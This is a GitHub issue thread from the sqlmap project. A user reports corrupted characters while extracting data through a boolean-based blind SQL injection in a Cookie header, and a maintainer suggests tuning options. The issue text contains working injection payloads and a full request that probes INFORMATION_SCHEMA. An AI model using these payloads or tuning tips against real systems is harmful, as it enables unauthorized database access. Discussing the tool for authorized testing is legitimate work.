### ISSUE TITLE
Bad characters in retrieve data

### ISSUE THREAD

**Issue by albertotombax** [sqlmapproject/sqlmap#4434]
Hello,

During retrieving data I Get false characters for example I get` jnformatpon_id `instead of `information_id` (I get always the same result I tried run sqlmap a few times)

I tried change/use --encoding ,--no-cast, tampers etc. And I never get valid data. I see first time that case. 

```
Parameter: Cookie #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: language=en-gb;SESSID=1' OR NOT 3171=3171-- HHIX;
    Vector: OR NOT [INFERENCE]
```

and example request :

```
GET /index.php HTTP/1.1
Host: www.google.com
Referer: www.google.com:80/index.php
Accept-encoding: gzip,deflate
Cookie: language=en-gb;SESSID=1' OR NOT ORD(MID((SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='table' AND table_schema='database'),1,1))>51-- DyEq;
X-Requested-With: XMLHttpRequest
Accept: */*
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Connection: close

HTTP response [#2] (200 OK):
Transfer-encoding: chunked
Content-encoding: gzip
Uri: www.google.com:443/index.php
Server: nginx
Connection: close
Date: Sat, 21 Nov 2020 14:29:02 GMT
Content-type: text/html; charset=UTF-8
```

Do you have any hints what could be the reason?

Best Regards

**Comment by stamparm** [comment]
A) Your case looks really strange/non common. `OR` payload inside `Cookie`. But nevertheless, if you are indeed getting any kind of printable chars out this could indeed be a positive
B) In case of cases like this, where there are retrieval problems in boolean-based blind (not time-based blind) cases, you should use option(s) like `--string`. In such case, you should use a string that appears inside the reply that you get with `OR 1=1` and does not appear in regular/standard/`OR 0=1` reply.
C) if B) is too hard for you to setup, you can try switches like `--text-only` or `--code` (if there is a change in HTTP code between true and false responses)
D) if all fails, you should really take a look into traffic (e.g. `-t traffic.txt`) and try to see where is the problem. Maybe there is some problem in response which causes this
